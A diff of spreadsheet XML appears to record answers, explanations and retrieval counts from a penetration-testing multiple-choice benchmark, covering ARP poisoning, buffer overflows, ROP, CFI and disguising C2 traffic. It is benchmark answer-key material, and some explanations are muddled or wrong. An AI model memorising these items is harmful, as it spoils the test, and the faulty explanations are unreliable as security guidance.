-Explanation: Burp Suite is a specialized tool designed for testing and manipulating HTTP/HTTPS traffic. While Wireshark is excellent for analyzing traffic, it does not allow for the active manipulation of sessions. Metasploit is powerful for exploitation and initial payload delivery but is typically less focused on long-term persistence compared to Cobalt Strike. Nikto is a web vulnerability scanner that can identify potential security issues in web servers, but it doesn't allow for the active manipulation of sessions like Burp Suite does.</t>
+Explanation: Burp Suite is a specialized tool designed for testing and manipulating HTTP/HTTPS traffic. While Wireshark is excellent for analyzing traffic, it does not allow for the active manipulation of sessions. Metasploit is great for launching pre-built exploits but is not specifically designed for web application session manipulation. Nikto is a tool for web vulnerability scanning and does not allow for real-time modification of HTTP/HTTPS traffic.</t>
         </is>
       </c>
       <c r="G79" t="inlineStr">
@@ -5705,21 +5318,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I79" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J79" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K79" t="inlineStr">
         <is>
@@ -5758,7 +5366,7 @@
       <c r="F80" t="inlineStr">
         <is>
           <t>Answer: Use-after-free vulnerability
-Explanation: A use-after-free vulnerability occurs when an application attempts to use memory after it has been freed, potentially allowing attackers to execute arbitrary code due to corrupt memory management. This vulnerability type provides a viable path for an attacker to introduce malevolent code into the application's process memory. A buffer overflow, while also related to improper memory management, typically involves overwriting memory boundaries. Cross-site scripting and SQL injection are incorrect as they are typically found in malware.</t>
+Explanation: A use-after-free vulnerability occurs when an application attempts to use memory after it has been freed, potentially allowing attackers to execute arbitrary code due to corrupt memory management. This vulnerability type provides a viable path for an attacker to introduce malevolent code into the application's process memory. A buffer overflow, while also related to improper memory management, typically involves overwriting memory boundaries. Cross-site scripting and SQL injection are incorrect as they are typically techniques found in malware.</t>
         </is>
       </c>
       <c r="G80" t="inlineStr">
@@ -5772,21 +5380,16 @@
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I80" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J80" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K80" t="inlineStr">
         <is>
@@ -5825,7 +5428,7 @@
       <c r="F81" t="inlineStr">
         <is>
           <t>Answer: Using ARP poisoning to disrupt network traffic on a switch
-Explanation: In the context of network security, manipulating and controlling traffic flowing through a switched network environment is most effectively achieved by using ARP (Address Resolution Protocol) poisoning. ARP poisoning involves sending forged ARP messages onto a local network segment. Attackers use ARP poisoning to link their MAC address with the IP address of a legitimate computer or server on the network, causing any traffic meant for that IP address to be sent to the attacker instead. This allows the attacker to intercept, modify, or even stop data in-transit. The other options involve specific types of systems or databases and do not directly manipulate memory management like use-after-free vulnerabilities.</t>
+Explanation: ARP poisoning involves sending forged ARP messages onto a local network segment. Attackers use ARP poisoning to link their MAC address with the IP address of a legitimate computer or server on the network, causing any traffic meant for that IP address to be sent to the attacker instead. This allows the attacker to intercept, modify, or even stop data in-transit. Options such as deploying a DLL injection and executing a SQL injection attack target specific types of systems or databases, respectively, while introducing a JavaScript snippet in a web page is more related to cross-site scripting (XSS) attacks rather than manipulating traffic on a switched network environment.</t>
         </is>
       </c>
       <c r="G81" t="inlineStr">
@@ -5839,21 +5442,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I81" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J81" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K81" t="inlineStr">
         <is>
@@ -5892,7 +5490,7 @@
       <c r="F82" t="inlineStr">
         <is>
           <t>Answer: Stack-based buffer overflow
-Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. The failure to gain execution control despite the use of NOP sled techniques suggests that security mitigations such as Data Execution Prevention (DEP) or Address Space Layout Randomization (ASLR) are in place to prevent this type of attack. These built-in protections can make it more difficult for an attacker to exploit a buffer overflow vulnerability and gain control over the system. Integer overflow and format string vulnerabilities, while related to handling of input data, do not typically result in crashes when excessively large inputs are fed into certain fields. Cross-site scripting (XSS) is a client-side web application vulnerability that does not control network traffic flow.</t>
+Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. The failure to gain execution control despite the use of NOP sled techniques suggests that security mitigations such as Data Execution Prevention (DEP) or Address Space Layout Randomization (ASLR) are in place to prevent this type of attack. These protections make it more difficult for an attacker to exploit a buffer overflow vulnerability and gain control over the execution flow of the application. Integer overflow, format string vulnerability, and cross-site scripting are not relevant in this context as they involve different types of vulnerabilities and do not explain the observed behavior.</t>
         </is>
       </c>
       <c r="G82" t="inlineStr">
@@ -5906,21 +5504,16 @@
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I82" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J82" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K82" t="inlineStr">
         <is>
@@ -5959,7 +5552,7 @@
       <c r="F83" t="inlineStr">
         <is>
           <t>Answer: ROP (Return-Oriented Programming)
-Explanation: ROP (Return-Oriented Programming) is specifically effective for bypassing non-executable stack protections. It allows an attacker to execute arbitrary code in the presence of security mechanisms such as non-executable stack protections by using short sequences of instructions ending in a return statement, present in the programs' own executable. These sequences are called 'gadgets'. XSS (Cross-Site Scripting) and SQL Injection are types of attacks primarily aimed at web applications to manipulate client-side scripts and manage SQL servers respectively, not bypassing memory protection mechanisms. Spear Phishing is a social engineering attack to deceive individuals into revealing confidential information, not a technique to bypass memory protections.</t>
+Explanation: ROP (Return-Oriented Programming) is the correct answer because it allows an attacker to execute arbitrary code in the presence of security mechanisms such as non-executable stack protections by using short sequences of instructions ending in a return statement, present in the programs' own executable. These sequences are called 'gadgets'. XSS (Cross-Site Scripting) and SQL Injection are types of attacks primarily aimed at web applications to manipulate client-side scripts and manage SQL servers respectively, not bypassing memory protection mechanisms. Spear Phishing is a social engineering attack to deceive individuals into revealing confidential information, not a technique to bypass memory protections.</t>
         </is>
       </c>
       <c r="G83" t="inlineStr">
@@ -5973,21 +5566,16 @@
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 206067af-6da5-4c4c-ab91-ab3ef496f54b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I83" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J83" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K83" t="inlineStr">
         <is>
@@ -6040,21 +5628,16 @@
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 2284c68d-f358-4abf-bedb-673c5c8ca0d7, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 11d98a52-b0af-474d-bbd1-38cbf4a246e7, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: eab6ace7-159e-4140-8209-e300bd81514c, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I84" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J84" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K84" t="inlineStr">
         <is>
@@ -6093,7 +5676,7 @@
       <c r="F85" t="inlineStr">
         <is>
           <t>Answer: Exploiting buffer overflow in an FTP service
-Explanation: Exploiting buffer overflow in an FTP service is the correct choice because buffer overflows are a common issue in services that do not properly manage memory operations, such as unsafe handling of user inputs and data size limitations. Buffer overflow vulnerabilities allow an attacker to overrun the buffer's boundary and overwrite adjacent memory locations, potentially leading to arbitrary code execution on the server. Timing attacks, although useful in some contexts, are geared towards exploitation of cryptographic systems by observing time variations. Brute-forcing SSH credentials, while a valid penetration testing technique, is unrelated to exploiting memory vulnerabilities and relies instead on guessing passwords. SQL injection is irrelevant here, as it is a different class of exploit that targets data handling in applications rather than executing code through memory corruption.</t>
+Explanation: The correct answer is 'Exploiting buffer overflow in an FTP service'. Buffer overflows are a common issue in services that do not properly manage memory operations, such as unsafe handling of user inputs and data size limitations. Buffer overflow vulnerabilities allow an attacker to overrun the buffer's boundary and overwrite adjacent memory locations, potentially leading to arbitrary code execution on the server. Timing attacks, although useful in some contexts, are geared towards exploitation of cryptographic systems by observing time variations. Brute-forcing SSH credentials, while a valid penetration testing technique, is unrelated to exploiting memory vulnerabilities and relies instead on guessing passwords. SQL injection via web forms is incorrect as it targets data handling in applications rather than executing code through memory corruption.</t>
         </is>
       </c>
       <c r="G85" t="inlineStr">
@@ -6107,21 +5690,16 @@
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I85" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J85" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K85" t="inlineStr">
         <is>
@@ -6160,7 +5738,7 @@
       <c r="F86" t="inlineStr">
         <is>
           <t>Answer: Command and Control (C2) traffic manipulation
-Explanation: Maintaining persistence in a red team operation often requires subtle and stealthy methods to avoid detection by network security measures. 'Command and Control (C2) traffic manipulation' is the most effective technique among the options for achieving this. It involves disguising C2 communications to blend in with normal network traffic, thereby avoiding triggering alerts from intrusion detection systems or security analysts. 'Escalating network privileges using ARP spoofing' and 'Bypassing application whitelisting through DLL injection' are techniques primarily used for initial penetration or lateral movement, not for maintaining persistence. 'Exploiting SQL injection to gain initial access</t>
+Explanation: Maintaining persistence in a red team operation often requires subtle and stealthy methods to avoid detection by network security measures. 'Command and Control (C2) traffic manipulation' is the most effective technique among the options for achieving this. It involves disguising C2 communications to blend in with normal network traffic, thereby avoiding triggering alerts from intrusion detection systems or security analysts. 'Escalating network privileges using ARP spoofing' and 'Bypassing application whitelisting through DLL injection' are techniques primarily used for initial penetration or lateral movement, not for maintaining persistence. 'Exploiting SQL injection to gain initial access' can help obtain initial access but is not focused on maintaining persistence.</t>
         </is>
       </c>
       <c r="G86" t="inlineStr">
@@ -6174,21 +5752,16 @@
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I86" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J86" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K86" t="inlineStr">
         <is>
@@ -6241,21 +5814,16 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I87" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J87" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K87" t="inlineStr">
         <is>
@@ -6308,21 +5876,16 @@
 preemware_pentestingeval.pdf (Chunk: 15c58756-ef43-4c97-94a3-776946473168, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I88" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J88" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K88" t="inlineStr">
         <is>
@@ -6361,7 +5924,7 @@
       <c r="F89" t="inlineStr">
         <is>
           <t>Answer: Shellcode injection via buffer overflow
-Explanation: Shellcode injection via buffer overflow is the most effective choice for achieving the goal stated in the question. This method uses a memory corruption error to run arbitrary code directly within the context of the application, which can be crafted to create backdoors or rootkits, thereby providing persistent and stealthy access. Cross-site scripting (XSS) exploitation primarily affects web applications and manipulates client-side scripts, which is less about maintaining long-term access to a host system. SQL injection is powerful for data exfiltration and sometimes initial access, but it does not naturally provide persistent host access nor typically involve interaction with a victim's browser.</t>
+Explanation: Shellcode injection via buffer overflow is the most effective choice for achieving the goal stated in the question. This method uses a memory corruption error to run arbitrary code directly within the context of the application, which can be crafted to create backdoors or rootkits, thereby providing persistent and stealthy access. Cross-site scripting (XSS) exploitation primarily affects web applications and manipulates client-side scripts, which is less about maintaining long-term access to a host system. SQL injection is powerful for data exfiltration and sometimes initial access, but it does not naturally provide persistent host access nor avoid detection.</t>
         </is>
       </c>
       <c r="G89" t="inlineStr">
@@ -6375,21 +5938,16 @@
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I89" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J89" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K89" t="inlineStr">
         <is>
@@ -6428,8 +5986,8 @@
       </c>
       <c r="F90" t="inlineStr">
         <is>
-          <t>Answer: Control Flow Integrity (CFI)
-Explanation: Control Flow Integrity (CFI) is specifically designed to protect systems against Return-Oriented Programming (ROP) attacks. CFI works by ensuring that the control flow graph (CFG) of a program, established at compile time, is adhered to, thus making exploitation through unexpected execution paths, such as those leveraged in ROP attacks, much more difficult. Stack canaries are used to detect buffer overflow attacks but do not specifically prevent ROP attacks. Address Space Layout Randomization (ASLR) makes it harder for attackers to predict memory addresses, which does hinder ROP attacks but does not prevent them outright. Executable Space Protection is a general term referring to the prevention of code execution from non-executable memory regions like the stack, which is a prerequisite for ROP attacks but not a specific defense against them.</t>
+          <t>Answer: Control flow integrity (CFI)
+Explanation: Control flow integrity (CFI) is specifically designed to protect systems against Return-Oriented Programming (ROP) attacks. CFI enforces a policy that ensures the control flow graph of the program, established at compile time, is adhered to, thus making exploitation through unexpected execution paths, such as those leveraged in ROP attacks, much more difficult. Stack canaries are used to detect buffer overflow attacks by detecting changes to memory but do not specifically prevent ROP attacks where the control flow can be altered without necessarily triggering changes detected by stack canaries. Address Space Layout Randomization (ASLR) makes it harder for attackers to predict memory addresses, which does hinder ROP attacks but does not specifically protect against them. Executable Space Protection is a general term referring to preventing code execution from non-executable memory regions and is not specific to ROP attacks.</t>
         </is>
       </c>
       <c r="G90" t="inlineStr">
@@ -6443,21 +6001,16 @@
 preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I90" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J90" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K90" t="inlineStr">
         <is>
@@ -6496,7 +6049,7 @@
       <c r="F91" t="inlineStr">
         <is>
           <t>Answer: Overwriting the return address of a function on the stack
